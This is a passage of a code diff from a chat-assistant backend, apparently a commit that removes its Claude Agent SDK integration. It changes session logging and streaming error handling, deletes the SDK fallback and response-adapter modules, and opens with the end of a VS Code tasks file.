"problemMatcher": []
|
||||
},
|
||||
{
|
||||
"label": "Seed Test Data",
|
||||
"type": "shell",
|
||||
"command": "make test-data",
|
||||
"options": {
|
||||
"cwd": "${workspaceFolder}"
|
||||
},
|
||||
"problemMatcher": []
|
||||
},
|
||||
{
|
||||
"label": "Format Code",
|
||||
"type": "shell",
|
||||
"command": "make format",
|
||||
"options": {
|
||||
"cwd": "${workspaceFolder}"
|
||||
},
|
||||
"problemMatcher": []
|
||||
},
|
||||
{
|
||||
"label": "Backend: Run Tests",
|
||||
"type": "shell",
|
||||
"command": "poetry run test",
|
||||
"options": {
|
||||
"cwd": "${workspaceFolder}/backend"
|
||||
},
|
||||
"problemMatcher": [],
|
||||
"group": "test"
|
||||
},
|
||||
{
|
||||
"label": "Frontend: Run Tests",
|
||||
"type": "shell",
|
||||
"command": "pnpm test",
|
||||
"options": {
|
||||
"cwd": "${workspaceFolder}/frontend"
|
||||
},
|
||||
"problemMatcher": [],
|
||||
"group": "test"
|
||||
},
|
||||
{
|
||||
"label": "Frontend: Run E2E Tests",
|
||||
"type": "shell",
|
||||
"command": "pnpm test:e2e",
|
||||
"options": {
|
||||
"cwd": "${workspaceFolder}/frontend"
|
||||
},
|
||||
"problemMatcher": [],
|
||||
"group": "test"
|
||||
},
|
||||
{
|
||||
"label": "Generate API Client",
|
||||
"type": "shell",
|
||||
"command": "pnpm generate:api",
|
||||
"options": {
|
||||
"cwd": "${workspaceFolder}/frontend"
|
||||
},
|
||||
"problemMatcher": []
|
||||
},
|
||||
{
|
||||
"label": "View Docker Logs",
|
||||
"type": "shell",
|
||||
"command": "docker compose logs -f",
|
||||
"options": {
|
||||
"cwd": "${workspaceFolder}"
|
||||
},
|
||||
"problemMatcher": [],
|
||||
"isBackground": true
|
||||
},
|
||||
{
|
||||
"label": "Reset Database",
|
||||
"type": "shell",
|
||||
"command": "make reset-db",
|
||||
"options": {
|
||||
"cwd": "${workspaceFolder}"
|
||||
},
|
||||
"problemMatcher": []
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -27,11 +27,12 @@ class ChatConfig(BaseSettings):
|
||||
session_ttl: int = Field(default=43200, description="Session TTL in seconds")
|
||||
|
||||
# Streaming Configuration
|
||||
stream_timeout: int = Field(default=300, description="Stream timeout in seconds")
|
||||
max_retries: int = Field(
|
||||
default=3,
|
||||
description="Max retries for fallback path (SDK handles retries internally)",
|
||||
max_context_messages: int = Field(
|
||||
default=50, ge=1, le=200, description="Maximum context messages"
|
||||
)
|
||||
|
||||
stream_timeout: int = Field(default=300, description="Stream timeout in seconds")
|
||||
max_retries: int = Field(default=3, description="Maximum number of retries")
|
||||
max_agent_runs: int = Field(default=30, description="Maximum number of agent runs")
|
||||
max_agent_schedules: int = Field(
|
||||
default=30, description="Maximum number of agent schedules"
|
||||
@@ -92,12 +93,6 @@ class ChatConfig(BaseSettings):
|
||||
description="Name of the prompt in Langfuse to fetch",
|
||||
)
|
||||
|
||||
# Claude Agent SDK Configuration
|
||||
use_claude_agent_sdk: bool = Field(
|
||||
default=True,
|
||||
description="Use Claude Agent SDK for chat completions",
|
||||
)
|
||||
|
||||
# Extended thinking configuration for Claude models
|
||||
thinking_enabled: bool = Field(
|
||||
default=True,
|
||||
@@ -143,17 +138,6 @@ class ChatConfig(BaseSettings):
|
||||
v = os.getenv("CHAT_INTERNAL_API_KEY")
|
||||
return v
|
||||
|
||||
@field_validator("use_claude_agent_sdk", mode="before")
|
||||
@classmethod
|
||||
def get_use_claude_agent_sdk(cls, v):
|
||||
"""Get use_claude_agent_sdk from environment if not provided."""
|
||||
# Check environment variable - default to True if not set
|
||||
env_val = os.getenv("CHAT_USE_CLAUDE_AGENT_SDK", "").lower()
|
||||
if env_val:
|
||||
return env_val in ("true", "1", "yes", "on")
|
||||
# Default to True (SDK enabled by default)
|
||||
return True if v is None else v
|
||||
|
||||
# Prompt paths for different contexts
|
||||
PROMPT_PATHS: dict[str, str] = {
|
||||
"default": "prompts/chat_system.md",
|
||||
|
||||
@@ -273,8 +273,9 @@ async def _get_session_from_cache(session_id: str) -> ChatSession | None:
|
||||
try:
|
||||
session = ChatSession.model_validate_json(raw_session)
|
||||
logger.info(
|
||||
f"[CACHE] Loaded session {session_id}: {len(session.messages)} messages, "
|
||||
f"last_roles={[m.role for m in session.messages[-3:]]}" # Last 3 roles
|
||||
f"Loading session {session_id} from cache: "
|
||||
f"message_count={len(session.messages)}, "
|
||||
f"roles={[m.role for m in session.messages]}"
|
||||
)
|
||||
return session
|
||||
except Exception as e:
|
||||
@@ -316,9 +317,11 @@ async def _get_session_from_db(session_id: str) -> ChatSession | None:
|
||||
return None
|
||||
|
||||
messages = prisma_session.Messages
|
||||
logger.debug(
|
||||
f"[DB] Loaded session {session_id}: {len(messages) if messages else 0} messages, "
|
||||
f"roles={[m.role for m in messages[-3:]] if messages else []}" # Last 3 roles
|
||||
logger.info(
|
||||
f"Loading session {session_id} from DB: "
|
||||
f"has_messages={messages is not None}, "
|
||||
f"message_count={len(messages) if messages else 0}, "
|
||||
f"roles={[m.role for m in messages] if messages else []}"
|
||||
)
|
||||
|
||||
return ChatSession.from_db(prisma_session, messages)
|
||||
@@ -369,9 +372,10 @@ async def _save_session_to_db(
|
||||
"function_call": msg.function_call,
|
||||
}
|
||||
)
|
||||
logger.debug(
|
||||
f"[DB] Saving {len(new_messages)} messages to session {session.session_id}, "
|
||||
f"roles={[m['role'] for m in messages_data]}"
|
||||
logger.info(
|
||||
f"Saving {len(new_messages)} new messages to DB for session {session.session_id}: "
|
||||
f"roles={[m['role'] for m in messages_data]}, "
|
||||
f"start_sequence={existing_message_count}"
|
||||
)
|
||||
await chat_db.add_chat_messages_batch(
|
||||
session_id=session.session_id,
|
||||
@@ -411,7 +415,7 @@ async def get_chat_session(
|
||||
logger.warning(f"Unexpected cache error for session {session_id}: {e}")
|
||||
|
||||
# Fall back to database
|
||||
logger.debug(f"Session {session_id} not in cache, checking database")
|
||||
logger.info(f"Session {session_id} not in cache, checking database")
|
||||
session = await _get_session_from_db(session_id)
|
||||
|
||||
if session is None:
|
||||
@@ -428,6 +432,7 @@ async def get_chat_session(
|
||||
# Cache the session from DB
|
||||
try:
|
||||
await _cache_session(session)
|
||||
logger.info(f"Cached session {session_id} from database")
|
||||
except Exception as e:
|
||||
logger.warning(f"Failed to cache session {session_id}: {e}")
|
||||
|
||||
@@ -598,19 +603,13 @@ async def update_session_title(session_id: str, title: str) -> bool:
|
||||
logger.warning(f"Session {session_id} not found for title update")
|
||||
return False
|
||||
|
||||
# Update title in cache if it exists (instead of invalidating).
|
||||
# This prevents race conditions where cache invalidation causes
|
||||
# the frontend to see stale DB data while streaming is still in progress.
|
||||
# Invalidate cache so next fetch gets updated title
|
||||
try:
|
||||
cached = await _get_session_from_cache(session_id)
|
||||
if cached:
|
||||
cached.title = title
|
||||
await _cache_session(cached)
|
||||
redis_key = _get_session_cache_key(session_id)
|
||||
async_redis = await get_redis_async()
|
||||
await async_redis.delete(redis_key)
|
||||
except Exception as e:
|
||||
# Not critical - title will be correct on next full cache refresh
|
||||
logger.warning(
|
||||
f"Failed to update title in cache for session {session_id}: {e}"
|
||||
)
|
||||
logger.warning(f"Failed to invalidate cache for session {session_id}: {e}")
|
||||
|
||||
return True
|
||||
except Exception as e:
|
||||
|
||||
@@ -1,6 +1,5 @@
|
||||
"""Chat API routes for chat session management and streaming via SSE."""
|
||||
|
||||
import asyncio
|
||||
import logging
|
||||
import uuid as uuid_module
|
||||
from collections.abc import AsyncGenerator
|
||||
@@ -17,16 +16,8 @@ from . import service as chat_service
|
||||
from . import stream_registry
|
||||
from .completion_handler import process_operation_failure, process_operation_success
|
||||
from .config import ChatConfig
|
||||
from .model import (
|
||||
ChatMessage,
|
||||
ChatSession,
|
||||
create_chat_session,
|
||||
get_chat_session,
|
||||
get_user_sessions,
|
||||
upsert_chat_session,
|
||||
)
|
||||
from .response_model import StreamError, StreamFinish, StreamHeartbeat, StreamStart
|
||||
from .sdk import service as sdk_service
|
||||
from .model import ChatSession, create_chat_session, get_chat_session, get_user_sessions
|
||||
from .response_model import StreamFinish, StreamHeartbeat
|
||||
from .tools.models import (
|
||||
AgentDetailsResponse,
|
||||
AgentOutputResponse,
|
||||
@@ -49,7 +40,6 @@ from .tools.models import (
|
||||
SetupRequirementsResponse,
|
||||
UnderstandingUpdatedResponse,
|
||||
)
|
||||
from .tracking import track_user_message
|
||||
|
||||
config = ChatConfig()
|
||||
|
||||
@@ -241,10 +231,6 @@ async def get_session(
|
||||
active_task, last_message_id = await stream_registry.get_active_task_for_session(
|
||||
session_id, user_id
|
||||
)
|
||||
logger.info(
|
||||
f"[GET_SESSION] session={session_id}, active_task={active_task is not None}, "
|
||||
f"msg_count={len(messages)}, last_role={messages[-1].get('role') if messages else 'none'}"
|
||||
)
|
||||
if active_task:
|
||||
# Filter out the in-progress assistant message from the session response.
|
||||
# The client will receive the complete assistant response through the SSE
|
||||
@@ -314,9 +300,10 @@ async def stream_chat_post(
|
||||
f"user={user_id}, message_len={len(request.message)}",
|
||||
extra={"json_fields": log_meta},
|
||||
)
|
||||
|
||||
session = await _validate_and_get_session(session_id, user_id)
|
||||
logger.info(
|
||||
f"[TIMING] session validated in {(time.perf_counter() - stream_start_time) * 1000:.1f}ms",
|
||||
f"[TIMING] session validated in {(time.perf_counter() - stream_start_time)*1000:.1f}ms",
|
||||
extra={
|
||||
"json_fields": {
|
||||
**log_meta,
|
||||
@@ -325,28 +312,6 @@ async def stream_chat_post(
|
||||
},
|
||||
)
|
||||
|
||||
# Add user message to session BEFORE creating task to avoid race condition
|
||||
# where GET_SESSION sees the task as "running" but the message isn't saved yet
|
||||
if request.message:
|
||||
session.messages.append(
|
||||
ChatMessage(
|
||||
role="user" if request.is_user_message else "assistant",
|
||||
content=request.message,
|
||||
)
|
||||
)
|
||||
if request.is_user_message:
|
||||
track_user_message(
|
||||
user_id=user_id,
|
||||
session_id=session_id,
|
||||
message_length=len(request.message),
|
||||
)
|
||||
logger.info(
|
||||
f"[STREAM] Saving user message to session {session_id}, "
|
||||
f"msg_count={len(session.messages)}"
|
||||
)
|
||||
session = await upsert_chat_session(session)
|
||||
logger.info(f"[STREAM] User message saved for session {session_id}")
|
||||
|
||||
# Create a task in the stream registry for reconnection support
|
||||
task_id = str(uuid_module.uuid4())
|
||||
operation_id = str(uuid_module.uuid4())
|
||||
@@ -362,7 +327,7 @@ async def stream_chat_post(
|
||||
operation_id=operation_id,
|
||||
)
|
||||
logger.info(
|
||||
f"[TIMING] create_task completed in {(time.perf_counter() - task_create_start) * 1000:.1f}ms",
|
||||
f"[TIMING] create_task completed in {(time.perf_counter() - task_create_start)*1000:.1f}ms",
|
||||
extra={
|
||||
"json_fields": {
|
||||
**log_meta,
|
||||
@@ -383,43 +348,15 @@ async def stream_chat_post(
|
||||
first_chunk_time, ttfc = None, None
|
||||
chunk_count = 0
|
||||
try:
|
||||
# Emit a start event with task_id for reconnection
|
||||
start_chunk = StreamStart(messageId=task_id, taskId=task_id)
|
||||
await stream_registry.publish_chunk(task_id, start_chunk)
|
||||
logger.info(
|
||||
f"[TIMING] StreamStart published at {(time_module.perf_counter() - gen_start_time) * 1000:.1f}ms",
|
||||
extra={
|
||||
"json_fields": {
|
||||
**log_meta,
|
||||
"elapsed_ms": (time_module.perf_counter() - gen_start_time)
|
||||
* 1000,
|
||||
}
|
||||
},
|
||||
)
|
||||
|
||||
# Choose service based on configuration
|
||||
use_sdk = config.use_claude_agent_sdk
|
||||
stream_fn = (
|
||||
sdk_service.stream_chat_completion_sdk
|
||||
if use_sdk
|
||||
else chat_service.stream_chat_completion
|
||||
)
|
||||
logger.info(
|
||||
f"[TIMING] Calling {'sdk' if use_sdk else 'standard'} stream_chat_completion",
|
||||
extra={"json_fields": log_meta},
|
||||
)
|
||||
# Pass message=None since we already added it to the session above
|
||||
async for chunk in stream_fn(
|
||||
async for chunk in chat_service.stream_chat_completion(
|
||||
session_id,
|
||||
None, # Message already in session
|
||||
request.message,
|
||||
is_user_message=request.is_user_message,
|
||||
user_id=user_id,
|
||||
session=session, # Pass session with message already added
|
||||
session=session, # Pass pre-fetched session to avoid double-fetch
|
||||
context=request.context,
|
||||
_task_id=task_id, # Pass task_id so service emits start with taskId for reconnection
|
||||
):
|
||||
# Skip duplicate StreamStart — we already published one above
|
||||
if isinstance(chunk, StreamStart):
|
||||
continue
|
||||
chunk_count += 1
|
||||
if first_chunk_time is None:
|
||||
first_chunk_time = time_module.perf_counter()
|
||||
@@ -440,7 +377,7 @@ async def stream_chat_post(
|
||||
gen_end_time = time_module.perf_counter()
|
||||
total_time = (gen_end_time - gen_start_time) * 1000
|
||||
logger.info(
|
||||
f"[TIMING] run_ai_generation FINISHED in {total_time / 1000:.1f}s; "
|
||||
f"[TIMING] run_ai_generation FINISHED in {total_time/1000:.1f}s; "
|
||||
f"task={task_id}, session={session_id}, "
|
||||
f"ttfc={ttfc or -1:.2f}s, n_chunks={chunk_count}",
|
||||
extra={
|
||||
@@ -467,17 +404,6 @@ async def stream_chat_post(
|
||||
}
|
||||
},
|
||||
)
|
||||
# Publish a StreamError so the frontend can display an error message
|
||||
try:
|
||||
await stream_registry.publish_chunk(
|
||||
task_id,
|
||||
StreamError(
|
||||
errorText="An error occurred. Please try again.",
|
||||
code="stream_error",
|
||||
),
|
||||
)
|
||||
except Exception:
|
||||
pass # Best-effort; mark_task_completed will publish StreamFinish
|
||||
await stream_registry.mark_task_completed(task_id, "failed")
|
||||
|
||||
# Start the AI generation in a background task
|
||||
@@ -580,14 +506,8 @@ async def stream_chat_post(
|
||||
"json_fields": {**log_meta, "elapsed_ms": elapsed, "error": str(e)}
|
||||
},
|
||||
)
|
||||
# Surface error to frontend so it doesn't appear stuck
|
||||
yield StreamError(
|
||||
errorText="An error occurred. Please try again.",
|
||||
code="stream_error",
|
||||
).to_sse()
|
||||
yield StreamFinish().to_sse()
|
||||
finally:
|
||||
# Unsubscribe when client disconnects or stream ends
|
||||
# Unsubscribe when client disconnects or stream ends to prevent resource leak
|
||||
if subscriber_queue is not None:
|
||||
try:
|
||||
await stream_registry.unsubscribe_from_task(
|
||||
@@ -831,6 +751,8 @@ async def stream_task(
|
||||
)
|
||||
|
||||
async def event_generator() -> AsyncGenerator[str, None]:
|
||||
import asyncio
|
||||
|
||||
heartbeat_interval = 15.0 # Send heartbeat every 15 seconds
|
||||
try:
|
||||
while True:
|
||||
|
||||
@@ -1,14 +0,0 @@
|
||||
"""Claude Agent SDK integration for CoPilot.
|
||||
|
||||
This module provides the integration layer between the Claude Agent SDK
|
||||
and the existing CoPilot tool system, enabling drop-in replacement of
|
||||
the current LLM orchestration with the battle-tested Claude Agent SDK.
|
||||
"""
|
||||
|
||||
from .service import stream_chat_completion_sdk
|
||||
from .tool_adapter import create_copilot_mcp_server
|
||||
|
||||
__all__ = [
|
||||
"stream_chat_completion_sdk",
|
||||
"create_copilot_mcp_server",
|
||||
]
|
||||
@@ -1,354 +0,0 @@
|
||||
"""Anthropic SDK fallback implementation.
|
||||
|
||||
This module provides the fallback streaming implementation using the Anthropic SDK
|
||||
directly when the Claude Agent SDK is not available.
|
||||
"""
|
||||
|
||||
import json
|
||||
import logging
|
||||
import os
|
||||
import uuid
|
||||
from collections.abc import AsyncGenerator
|
||||
from typing import Any, cast
|
||||
|
||||
from ..config import ChatConfig
|
||||
from ..model import ChatMessage, ChatSession
|
||||
from ..response_model import (
|
||||
StreamBaseResponse,
|
||||
StreamError,
|
||||
StreamFinish,
|
||||
StreamTextDelta,
|
||||
StreamTextEnd,
|
||||
StreamTextStart,
|
||||
StreamToolInputAvailable,
|
||||
StreamToolInputStart,
|
||||
StreamToolOutputAvailable,
|
||||
StreamUsage,
|
||||
)
|
||||
from .tool_adapter import get_tool_definitions, get_tool_handlers
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
config = ChatConfig()
|
||||
|
||||
# Maximum tool-call iterations before stopping to prevent infinite loops
|
||||
_MAX_TOOL_ITERATIONS = 10
|
||||
|
||||
|
||||
async def stream_with_anthropic(
|
||||
session: ChatSession,
|
||||
system_prompt: str,
|
||||
text_block_id: str,
|
||||
) -> AsyncGenerator[StreamBaseResponse, None]:
|
||||
"""Stream using Anthropic SDK directly with tool calling support.
|
||||
|
||||
This function accumulates messages into the session for persistence.
|
||||
The caller should NOT yield an additional StreamFinish - this function handles it.
|
||||
"""
|
||||
import anthropic
|
||||
|
||||
# Only use ANTHROPIC_API_KEY - don't fall back to OpenRouter keys
|
||||
api_key = os.getenv("ANTHROPIC_API_KEY")
|
||||
if not api_key:
|
||||
yield StreamError(
|
||||
errorText="ANTHROPIC_API_KEY not configured for fallback",
|
||||
code="config_error",
|
||||
)
|
||||
yield StreamFinish()
|
||||
return
|
||||
|
||||
client = anthropic.AsyncAnthropic(api_key=api_key)
|
||||
tool_definitions = get_tool_definitions()
|
||||
tool_handlers = get_tool_handlers()
|
||||
|
||||
anthropic_tools = [
|
||||
{
|
||||
"name": t["name"],
|
||||
"description": t["description"],
|
||||
"input_schema": t["inputSchema"],
|
||||
}
|
||||
for t in tool_definitions
|
||||
]
|
||||
|
||||
anthropic_messages = _convert_session_to_anthropic(session)
|
||||
|
||||
if not anthropic_messages or anthropic_messages[-1]["role"] != "user":
|
||||
anthropic_messages.append(
|
||||
{"role": "user", "content": "Continue with the task."}
|
||||
)
|
||||
|
||||
has_started_text = False
|
||||
accumulated_text = ""
|
||||
accumulated_tool_calls: list[dict[str, Any]] = []
|
||||
|
||||
for _ in range(_MAX_TOOL_ITERATIONS):
|
||||
try:
|
||||
async with client.messages.stream(
|
||||
model=(
|
||||
config.model.split("/")[-1] if "/" in config.model else config.model
|
||||
),
|
||||
max_tokens=4096,
|
||||
system=system_prompt,
|
||||
messages=cast(Any, anthropic_messages),
|
||||
tools=cast(Any, anthropic_tools) if anthropic_tools else [],
|
||||
) as stream:
|
||||
async for event in stream:
|
||||
if event.type == "content_block_start":
|
||||
block = event.content_block
|
||||
if hasattr(block, "type"):
|
||||
if block.type == "text" and not has_started_text:
|
||||
yield StreamTextStart(id=text_block_id)
|
||||
has_started_text = True
|
||||
elif block.type == "tool_use":
|
||||
yield StreamToolInputStart(
|
||||
toolCallId=block.id, toolName=block.name
|
||||
)
|
||||
|
||||
elif event.type == "content_block_delta":
|
||||
delta = event.delta
|
||||
if hasattr(delta, "type") and delta.type == "text_delta":
|
||||
accumulated_text += delta.text
|
||||
yield StreamTextDelta(id=text_block_id, delta=delta.text)
|
||||
|
||||
final_message = await stream.get_final_message()
|
||||
|
||||
if final_message.stop_reason == "tool_use":
|
||||
if has_started_text:
|
||||
yield StreamTextEnd(id=text_block_id)
|
||||
has_started_text = False
|
||||
text_block_id = str(uuid.uuid4())
|
||||
|
||||
tool_results = []
|
||||
assistant_content: list[dict[str, Any]] = []
|
||||
|
||||
for block in final_message.content:
|
||||
if block.type == "text":
|
||||
assistant_content.append(
|
||||
{"type": "text", "text": block.text}
|
||||
)
|
||||
elif block.type == "tool_use":
|
||||
assistant_content.append(
|
||||
{
|
||||
"type": "tool_use",
|
||||
"id": block.id,
|
||||
"name": block.name,
|
||||
"input": block.input,
|
||||
}
|
||||
)
|
||||
|
||||
# Track tool call for session persistence
|
||||
accumulated_tool_calls.append(
|
||||
{
|
||||
"id": block.id,
|
||||
"type": "function",
|
||||
"function": {
|
||||
"name": block.name,
|
||||
"arguments": json.dumps(
|
||||
block.input
|
||||
if isinstance(block.input, dict)
|
||||
else {}
|
||||
),
|
||||
},
|
||||
}
|
||||
)
|
||||
|
||||
yield StreamToolInputAvailable(
|
||||
toolCallId=block.id,
|
||||
toolName=block.name,
|
||||
input=(
|
||||
block.input if isinstance(block.input, dict) else {}
|
||||
),
|
||||
)
|
||||
|
||||
output, is_error = await _execute_tool(
|
||||
block.name, block.input, tool_handlers
|
||||
)
|
||||
|
||||
yield StreamToolOutputAvailable(
|
||||
toolCallId=block.id,
|
||||
toolName=block.name,
|
||||
output=output,
|
||||
success=not is_error,
|
||||
)
|
||||
|
||||
# Save tool result to session
|
||||
session.messages.append(
|
||||
ChatMessage(
|
||||
role="tool",
|
||||
content=output,
|
||||
tool_call_id=block.id,
|
||||
)
|
||||
)
|
||||
|
||||
tool_results.append(
|
||||
{
|
||||
"type": "tool_result",
|
||||
"tool_use_id": block.id,
|
||||
"content": output,
|
||||
"is_error": is_error,
|
||||
}
|
||||
)
|
||||
|
||||
# Save assistant message with tool calls to session
|
||||
session.messages.append(
|
||||
ChatMessage(
|
||||
role="assistant",
|
||||
content=accumulated_text or None,
|
||||
tool_calls=(
|
||||
accumulated_tool_calls
|
||||
if accumulated_tool_calls
|
||||
else None
|
||||
),
|
||||
)
|
||||
)
|
||||
# Reset for next iteration
|
||||
accumulated_text = ""
|
||||
accumulated_tool_calls = []
|
||||
|
||||
anthropic_messages.append(
|
||||
{"role": "assistant", "content": assistant_content}
|
||||
)
|
||||
anthropic_messages.append({"role": "user", "content": tool_results})
|
||||
continue
|
||||
|
||||
else:
|
||||
if has_started_text:
|
||||
yield StreamTextEnd(id=text_block_id)
|
||||
|
||||
# Save final assistant response to session
|
||||
if accumulated_text:
|
||||
session.messages.append(
|
||||
ChatMessage(role="assistant", content=accumulated_text)
|
||||
)
|
||||
|
||||
yield StreamUsage(
|
||||
promptTokens=final_message.usage.input_tokens,
|
||||
completionTokens=final_message.usage.output_tokens,
|
||||
totalTokens=final_message.usage.input_tokens
|
||||
+ final_message.usage.output_tokens,
|
||||
)
|
||||
yield StreamFinish()
|
||||
return
|
||||
|
||||
except Exception as e:
|
||||
logger.error(f"[Anthropic Fallback] Error: {e}", exc_info=True)
|
||||
yield StreamError(
|
||||
errorText="An error occurred. Please try again.",
|
||||
code="anthropic_error",
|
||||
)
|
||||
yield StreamFinish()
|
||||
return
|
||||
|
||||
yield StreamError(errorText="Max tool iterations reached", code="max_iterations")
|
||||
yield StreamFinish()
|
||||
|
||||
|
||||
def _convert_session_to_anthropic(session: ChatSession) -> list[dict[str, Any]]:
|
||||
"""Convert session messages to Anthropic format.
|
||||
|
||||
Handles merging consecutive same-role messages (Anthropic requires alternating roles).
|
||||
"""
|
||||
messages: list[dict[str, Any]] = []
|
||||
|
||||
for msg in session.messages:
|
||||
if msg.role == "user":
|
||||
new_msg = {"role": "user", "content": msg.content or ""}
|
||||
elif msg.role == "assistant":
|
||||
content: list[dict[str, Any]] = []
|
||||
if msg.content:
|
||||
content.append({"type": "text", "text": msg.content})
|
||||
if msg.tool_calls:
|
||||
for tc in msg.tool_calls:
|
||||
func = tc.get("function", {})
|
||||
args = func.get("arguments", {})
|
||||
if isinstance(args, str):
|
||||
try:
|
||||
args = json.loads(args)
|
||||
except json.JSONDecodeError:
|
||||
args = {}
|
||||
content.append(
|
||||
{
|
||||
"type": "tool_use",
|
||||
"id": tc.get("id", str(uuid.uuid4())),
|
||||
"name": func.get("name", ""),
|
||||
"input": args,
|
||||
}
|
||||
)
|
||||
if content:
|
||||
new_msg = {"role": "assistant", "content": content}
|
||||
else:
|
||||
continue # Skip empty assistant messages
|
||||
elif msg.role == "tool":
|
||||
new_msg = {
|
||||
"role": "user",
|
||||
"content": [
|
||||
{
|
||||
"type": "tool_result",
|
||||
"tool_use_id": msg.tool_call_id or "",
|
||||
"content": msg.content or "",
|
||||
}
|
||||
],
|
||||
}
|
||||
else:
|
||||
continue
|
||||
|
||||
messages.append(new_msg)
|
||||
|
||||
# Merge consecutive same-role messages (Anthropic requires alternating roles)
|
||||
return _merge_consecutive_roles(messages)
|
||||
|
||||
|
||||
def _merge_consecutive_roles(messages: list[dict[str, Any]]) -> list[dict[str, Any]]:
|
||||
"""Merge consecutive messages with the same role.
|
||||
|
||||
Anthropic API requires alternating user/assistant roles.
|
||||
"""
|
||||
if not messages:
|
||||
return []
|
||||
|
||||
merged: list[dict[str, Any]] = []
|
||||
for msg in messages:
|
||||
if merged and merged[-1]["role"] == msg["role"]:
|
||||
# Merge with previous message
|
||||
prev_content = merged[-1]["content"]
|
||||
new_content = msg["content"]
|
||||
|
||||
# Normalize both to list-of-blocks form
|
||||
if isinstance(prev_content, str):
|
||||
prev_content = [{"type": "text", "text": prev_content}]
|
||||
if isinstance(new_content, str):
|
||||
new_content = [{"type": "text", "text": new_content}]
|
||||
|
||||
# Ensure both are lists
|
||||
if not isinstance(prev_content, list):
|
||||
prev_content = [prev_content]
|
||||
if not isinstance(new_content, list):
|
||||
new_content = [new_content]
|
||||
|
||||
merged[-1]["content"] = prev_content + new_content
|
||||
else:
|
||||
merged.append(msg)
|
||||
|
||||
return merged
|
||||
|
||||
|
||||
async def _execute_tool(
|
||||
tool_name: str, tool_input: Any, handlers: dict[str, Any]
|
||||
) -> tuple[str, bool]:
|
||||
"""Execute a tool and return (output, is_error)."""
|
||||
handler = handlers.get(tool_name)
|
||||
if not handler:
|
||||
return f"Unknown tool: {tool_name}", True
|
||||
|
||||
try:
|
||||
result = await handler(tool_input)
|
||||
# Safely extract output - handle empty or missing content
|
||||
content = result.get("content") or []
|
||||
if content and isinstance(content, list) and len(content) > 0:
|
||||
first_item = content[0]
|
||||
output = first_item.get("text", "") if isinstance(first_item, dict) else ""
|
||||
else:
|
||||
output = ""
|
||||
is_error = result.get("isError", False)
|
||||
return output, is_error
|
||||
except Exception as e:
|
||||
return f"Error: {str(e)}", True
|
||||
@@ -1,198 +0,0 @@
|
||||
"""Response adapter for converting Claude Agent SDK messages to Vercel AI SDK format.
|
||||
|
||||
This module provides the adapter layer that converts streaming messages from
|
||||
the Claude Agent SDK into the Vercel AI SDK UI Stream Protocol format that
|
||||
the frontend expects.
|
||||
"""
|
||||
|
||||
import json
|
||||
import logging
|
||||
import uuid
|
||||
|
||||
from claude_agent_sdk import (
|
||||
AssistantMessage,
|
||||
Message,
|
||||
ResultMessage,
|
||||
SystemMessage,
|
||||
TextBlock,
|
||||
ToolResultBlock,
|
||||
ToolUseBlock,
|
||||
UserMessage,
|
||||
)
|
||||
|
||||
from backend.api.features.chat.response_model import (
|
||||
StreamBaseResponse,
|
||||
StreamError,
|
||||
StreamFinish,
|
||||
StreamFinishStep,
|
||||
StreamStart,
|
||||
StreamStartStep,
|
||||
StreamTextDelta,
|
||||
StreamTextEnd,
|
||||
StreamTextStart,
|
||||
StreamToolInputAvailable,
|
||||
StreamToolInputStart,
|
||||
StreamToolOutputAvailable,
|
||||
)
|
||||
from backend.api.features.chat.sdk.tool_adapter import (
|
||||
MCP_TOOL_PREFIX,
|
||||
pop_pending_tool_output,
|
||||
)
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class SDKResponseAdapter:
|
||||
"""Adapter for converting Claude Agent SDK messages to Vercel AI SDK format.
|
||||
|
||||
This class maintains state during a streaming session to properly track
|
||||
text blocks, tool calls, and message lifecycle.
|
||||
"""
|
||||
|
||||
def __init__(self, message_id: str | None = None):
|
||||
self.message_id = message_id or str(uuid.uuid4())
|
||||
self.text_block_id = str(uuid.uuid4())
|
||||
self.has_started_text = False
|
||||
self.has_ended_text = False
|
||||
self.current_tool_calls: dict[str, dict[str, str]] = {}
|
||||
self.task_id: str | None = None
|
||||
self.step_open = False
|
||||
|
||||
def set_task_id(self, task_id: str) -> None:
|
||||
"""Set the task ID for reconnection support."""
|
||||
self.task_id = task_id
|
||||
|
||||
def convert_message(self, sdk_message: Message) -> list[StreamBaseResponse]:
|
||||
"""Convert a single SDK message to Vercel AI SDK format."""
|
||||
responses: list[StreamBaseResponse] = []
|
||||
|
||||
if isinstance(sdk_message, SystemMessage):
|
||||
if sdk_message.subtype == "init":
|
||||
responses.append(
|
||||
StreamStart(messageId=self.message_id, taskId=self.task_id)
|
||||
)
|
||||
# Open the first step (matches non-SDK: StreamStart then StreamStartStep)
|
||||
responses.append(StreamStartStep())
|
||||
self.step_open = True
|
||||
|
||||
elif isinstance(sdk_message, AssistantMessage):
|
||||
# After tool results, the SDK sends a new AssistantMessage for the
|
||||
# next LLM turn. Open a new step if the previous one was closed.
|
||||
if not self.step_open:
|
||||
responses.append(StreamStartStep())
|
||||
self.step_open = True
|
||||
|
||||
for block in sdk_message.content:
|
||||
if isinstance(block, TextBlock):
|
||||
if block.text:
|
||||
self._ensure_text_started(responses)
|
||||
responses.append(
|
||||
StreamTextDelta(id=self.text_block_id, delta=block.text)
|
||||
)
|
||||
|
||||
elif isinstance(block, ToolUseBlock):
|
||||
self._end_text_if_open(responses)
|
||||
|
||||
# Strip MCP prefix so frontend sees "find_block"
|
||||
# instead of "mcp__copilot__find_block".
|
||||
tool_name = block.name.removeprefix(MCP_TOOL_PREFIX)
|
||||
|
||||
responses.append(
|
||||
StreamToolInputStart(toolCallId=block.id, toolName=tool_name)
|
||||
)
|
||||
responses.append(
|
||||
StreamToolInputAvailable(
|
||||
toolCallId=block.id,
|
||||
toolName=tool_name,
|
||||
input=block.input,
|
||||
)
|
||||
)
|
||||
self.current_tool_calls[block.id] = {"name": tool_name}
|
||||
|
||||
elif isinstance(sdk_message, UserMessage):
|
||||
# UserMessage carries tool results back from tool execution.
|
||||
content = sdk_message.content
|
||||
blocks = content if isinstance(content, list) else []
|
||||
for block in blocks:
|
||||
if isinstance(block, ToolResultBlock) and block.tool_use_id:
|
||||
tool_info = self.current_tool_calls.get(block.tool_use_id, {})
|
||||
tool_name = tool_info.get("name", "unknown")
|
||||
|
||||
# Prefer the stashed full output over the SDK's
|
||||
# (potentially truncated) ToolResultBlock content.
|
||||
# The SDK truncates large results, writing them to disk,
|
||||
# which breaks frontend widget parsing.
|
||||
output = pop_pending_tool_output(tool_name) or (
|
||||
_extract_tool_output(block.content)
|
||||
)
|
||||
|
||||
responses.append(
|
